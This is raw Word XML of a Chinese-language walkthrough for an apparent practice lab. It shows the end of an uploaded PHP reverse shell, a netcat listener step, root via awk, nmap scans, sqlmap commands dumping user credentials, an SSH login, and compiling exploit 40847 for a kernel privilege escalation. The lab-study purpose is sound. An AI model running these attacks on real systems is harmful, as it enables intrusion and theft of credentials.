      <w:r>
        <w:t>// (I can't figure out how to redirect STDOUT like a proper daemon)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34513978" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>function printit ($string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1688B6" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>if (!$daemon) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8778F9" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print "$string\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A38AD8A" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B66731B" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345AA2D5" w14:textId="77777777" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3"/>
    <w:p w14:paraId="77ED0806" w14:textId="14259EEC" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282937A9" w14:textId="58CAC854" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记得改ip我忘了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17994048" w14:textId="594B6644" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传就可以</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403DC9FE" w14:textId="018972B7" w:rsidR="00D917D3" w:rsidRDefault="00D917D3" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00D917D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="110289D0" wp14:editId="296D996F">
            <wp:extent cx="5212532" cy="4145639"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1626012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121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BAE6" w14:textId="47B7E10A" w:rsidR="00D917D3" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问就可以（前文的uploads里面）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF52A47" w14:textId="2D52BA48" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上传的时候会有报错回显不管就行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABFA779" w14:textId="4B562396" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r w:rsidRPr="0023569F">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42A006D6" wp14:editId="68FA47F3">
            <wp:extent cx="5274310" cy="2886075"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="1325904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046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F870" w14:textId="220EBC67" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044413B2" w14:textId="18A9F944" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r w:rsidRPr="0023569F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BCC73B4" wp14:editId="7D7F9D99">
            <wp:extent cx="3208298" cy="868755"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1356052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525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D15B" w14:textId="6FEB5D56" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记得开netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E428A7A" w14:textId="46D45634" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r w:rsidRPr="0023569F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AFBDE62" wp14:editId="7CA0DAF6">
            <wp:extent cx="5274310" cy="1434465"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1538809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091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938D" w14:textId="0E64C5D4" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搞定</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407C05E5" w14:textId="705291C4" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改一下shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D256AC" w14:textId="4A8ABF21" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r w:rsidRPr="0023569F">
        <w:t>python -c 'import pty;pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF732D3" w14:textId="7DDDD158" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r w:rsidRPr="0023569F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B524E4" wp14:editId="5D55057C">
            <wp:extent cx="4023709" cy="563929"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="274531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317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4620" w14:textId="26E6137C" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337458D2" w14:textId="00D004F7" w:rsidR="0023569F" w:rsidRDefault="0023569F" w:rsidP="00D917D3">
      <w:r w:rsidRPr="0023569F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="475B2CDB" wp14:editId="0FD49F16">
            <wp:extent cx="2461473" cy="693480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1074992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925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2C4F" w14:textId="108E99D6" w:rsidR="0023569F" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00EC05F1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49B06DD9" wp14:editId="2936E918">
            <wp:extent cx="5274310" cy="424180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="322092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923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002F" w14:textId="5712BE39" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00EC05F1">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05187F61" wp14:editId="064B7F94">
            <wp:extent cx="5274310" cy="1036320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="920244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443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BABB" w14:textId="59844B94" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时是用root运行的awk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E33173" w14:textId="180BA7C1" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去</w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>GTFOBins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>看一下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDF6B67" w14:textId="16CAF5FA" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00EC05F1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="034B295A" wp14:editId="15BAD474">
            <wp:extent cx="5274310" cy="1071880"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1106128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284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E90D" w14:textId="31B59010" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00EC05F1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D647102" wp14:editId="3150203C">
            <wp:extent cx="4816257" cy="472481"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1737610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108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B735" w14:textId="77777777" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00EC05F1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B66A075" wp14:editId="1B26730F">
            <wp:extent cx="1501270" cy="586791"/>
            <wp:effectExtent l="0" t="0" r="3810" b="3810"/>
            <wp:docPr id="1363270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707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5EEE" w14:textId="0B955795" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拿下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451E6795" w14:textId="79714CD1" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00EC05F1">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A9CF147" wp14:editId="41E0F44E">
            <wp:extent cx="1920406" cy="655377"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1021810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103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3CA6" w14:textId="53FD10FD" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现root里面不是flag而是一个ova下载下来</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF39D0E" w14:textId="41D8D2AB" w:rsidR="00EC05F1" w:rsidRDefault="00EC05F1" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidR="008F6B3F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面开一个http服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A8C9DA" w14:textId="7183D2E8" w:rsidR="008F6B3F" w:rsidRDefault="008F6B3F" w:rsidP="00D917D3">
      <w:r w:rsidRPr="008F6B3F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="693EFF45" wp14:editId="30D3F6F9">
            <wp:extent cx="3330229" cy="944962"/>
            <wp:effectExtent l="0" t="0" r="3810" b="7620"/>
            <wp:docPr id="673470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706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A955" w14:textId="1C099918" w:rsidR="008F6B3F" w:rsidRDefault="008F6B3F" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再开一个靶机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDA38FF" w14:textId="1DED6103" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27123544" w14:textId="26BE5F01" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E15868">
        <w:t>arp-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355AD436" w14:textId="0E9DCDCA" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00E15868">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64EBBC9A" wp14:editId="6F8B1127">
            <wp:extent cx="5274310" cy="1462405"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="1792275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759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7431" w14:textId="67ADC832" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.21.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632AB191" w14:textId="57947668" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A13EB39" w14:textId="15E1B490" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00E15868">
        <w:t>nmap --min-rate 1000 -p- 192.168.21.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B319FD0" w14:textId="22E88390" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00E15868">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D0BF1F8" wp14:editId="5E4E9BF2">
            <wp:extent cx="4938188" cy="1988992"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="500999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997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9975" w14:textId="5C9D67CC" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口服务扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34233B4D" w14:textId="72BA58CB" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00E15868">
        <w:t>nmap -sV -sT -O -p22,80 192.168.21.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B8EEA8" w14:textId="03F8B3F4" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00E15868">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="771C589A" wp14:editId="090AF665">
            <wp:extent cx="5274310" cy="2019935"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1004769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697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88B7" w14:textId="37F90545" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A147166" w14:textId="689B3BA9" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00E15868">
        <w:t>nmap --script=vuln -p22,80 192.168.21.162</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687F0883" w14:textId="2EBF8A45" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r w:rsidRPr="00E15868">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05284473" wp14:editId="2158F7E4">
            <wp:extent cx="5274310" cy="3456305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="164755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55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C318" w14:textId="6D0BDBC0" w:rsidR="00E15868" w:rsidRDefault="00E15868" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去web看看</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701B6C13" w14:textId="737C95F8" w:rsidR="00E15868" w:rsidRDefault="002D4B06" w:rsidP="00D917D3">
      <w:r w:rsidRPr="002D4B06">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D925138" wp14:editId="52CA724D">
            <wp:extent cx="5274310" cy="1822450"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="872083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837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F4AF" w14:textId="5EFADB60" w:rsidR="002D4B06" w:rsidRDefault="002D4B06" w:rsidP="00D917D3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先试试上面没扫全这个是自己写的大概率有sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCD8F51" w14:textId="0574B142" w:rsidR="002D4B06" w:rsidRDefault="002D4B06" w:rsidP="00D917D3">
      <w:r w:rsidRPr="002D4B06">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68C0F742" wp14:editId="69ECA704">
            <wp:extent cx="5274310" cy="6423025"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1614809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094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75C5" w14:textId="0167A8AD" w:rsidR="002D4B06" w:rsidRDefault="002D4B06" w:rsidP="002D4B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据提示看到这里确实有问题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5611BC7F" w14:textId="37029007" w:rsidR="002D4B06" w:rsidRDefault="002D4B06" w:rsidP="002D4B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接一把梭</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1ED27E" w14:textId="77777777" w:rsidR="002D4B06" w:rsidRDefault="002D4B06" w:rsidP="002D4B06">
      <w:r w:rsidRPr="002D4B06">
        <w:t>sqlmap -u http://192.168.21.162/index.php --batch --forms -dbs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03856BF4" w14:textId="1051D325" w:rsidR="002D4B06" w:rsidRDefault="002D4B06" w:rsidP="002D4B06">
      <w:r w:rsidRPr="002D4B06">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E1DDC67" wp14:editId="3F53B8B1">
            <wp:extent cx="5274310" cy="3916680"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="474839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391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1895" w14:textId="54498AB5" w:rsidR="002D4B06" w:rsidRDefault="002D4B06" w:rsidP="002D4B06">
      <w:r w:rsidRPr="002D4B06">
        <w:t xml:space="preserve">sqlmap -u http://192.168.21.162/index.php --batch --forms -D doubletrouble </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4B06">
        <w:t>tables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FC97E4" w14:textId="6CAEE757" w:rsidR="002D4B06" w:rsidRDefault="002D4B06" w:rsidP="002D4B06">
      <w:r w:rsidRPr="002D4B06">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CEDDEB5" wp14:editId="322046D7">
            <wp:extent cx="5274310" cy="4087495"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="501174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7417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B2E6" w14:textId="4C7BFC05" w:rsidR="002D4B06" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r w:rsidRPr="0080703E">
        <w:t xml:space="preserve">sqlmap -u http://192.168.21.162/index.php --batch --forms -D doubletrouble -T users </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0080703E">
        <w:t>columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242FC150" w14:textId="55B5FF53" w:rsidR="0080703E" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r w:rsidRPr="0080703E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4210F16A" wp14:editId="55519ED6">
            <wp:extent cx="5274310" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="95189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92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D62A" w14:textId="4F0263F5" w:rsidR="0080703E" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r w:rsidRPr="0080703E">
        <w:t xml:space="preserve">sqlmap -u http://192.168.21.162/index.php --batch --forms -D doubletrouble -T users -C username,password </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="0080703E">
        <w:t>dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7377EA08" w14:textId="7506892B" w:rsidR="0080703E" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r w:rsidRPr="0080703E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16C91F4C" wp14:editId="1D8D1C4D">
            <wp:extent cx="5274310" cy="2750185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="106976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667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2500" w14:textId="1CEDCB38" w:rsidR="0080703E" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sh登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E9C3F" w14:textId="7CAE14F9" w:rsidR="0080703E" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r w:rsidRPr="0080703E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D679316" wp14:editId="2BBBA154">
            <wp:extent cx="5274310" cy="3252470"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="386278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781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9F52" w14:textId="576230DF" w:rsidR="0080703E" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>登入只有一个成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4508C4EF" w14:textId="6BE3ADB6" w:rsidR="0080703E" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7B6DEC" w14:textId="6EFF205E" w:rsidR="0080703E" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r w:rsidRPr="0080703E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C89A9B0" wp14:editId="13CAD739">
            <wp:extent cx="5274310" cy="902970"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="66214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45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A2BE" w14:textId="70A35920" w:rsidR="0080703E" w:rsidRDefault="0080703E" w:rsidP="002D4B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>干干净净</w:t>
      </w:r>
      <w:r w:rsidR="00317674">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（linux</w:t>
      </w:r>
      <w:r w:rsidR="00317674">
        <w:t>3.2</w:t>
      </w:r>
      <w:r w:rsidR="00317674">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有洞，利用就行）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A8C56" w14:textId="1AAF4072" w:rsidR="0080703E" w:rsidRDefault="00317674" w:rsidP="002D4B06">
      <w:r w:rsidRPr="00317674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="504822BD" wp14:editId="03FF4AE3">
            <wp:extent cx="5274310" cy="2034540"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="88290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060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BC34" w14:textId="4C6F1CD4" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="002D4B06">
      <w:r w:rsidRPr="00317674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DB1C010" wp14:editId="072217DB">
            <wp:extent cx="4267570" cy="777307"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="267987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8717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2CAE" w14:textId="171F2A48" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="002D4B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复制到桌面</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F42552F" w14:textId="20301BA0" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="002D4B06">
      <w:r w:rsidRPr="00317674">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70A097F2" wp14:editId="57557A26">
            <wp:extent cx="5274310" cy="944245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1909112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1261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F6CF" w14:textId="361A3FC4" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="002D4B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行建议web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C388A8" w14:textId="25561E15" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="002D4B06">
      <w:r w:rsidRPr="00317674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73CCCC97" wp14:editId="12D1A934">
            <wp:extent cx="4419983" cy="602032"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="87934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403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335E" w14:textId="360F6145" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="002D4B06">
      <w:r w:rsidRPr="00317674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4894848A" wp14:editId="59EAE82A">
            <wp:extent cx="5274310" cy="1110615"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1343363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6332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下载文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F46D0A3" w14:textId="667275C7" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="002D4B06">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFC9920" w14:textId="6E3657B4" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:r>
        <w:t>g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A57BC87" w14:textId="2E6E5825" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:r w:rsidRPr="00317674">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A385064" wp14:editId="3D70FB13">
            <wp:extent cx="2400508" cy="457240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1213242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4222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6B22" w14:textId="56450247" w:rsidR="00317674" w:rsidRDefault="00317674" w:rsidP="00317674">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行4</w:t>
      </w:r>
      <w:r>
        <w:t>0847</w:t>
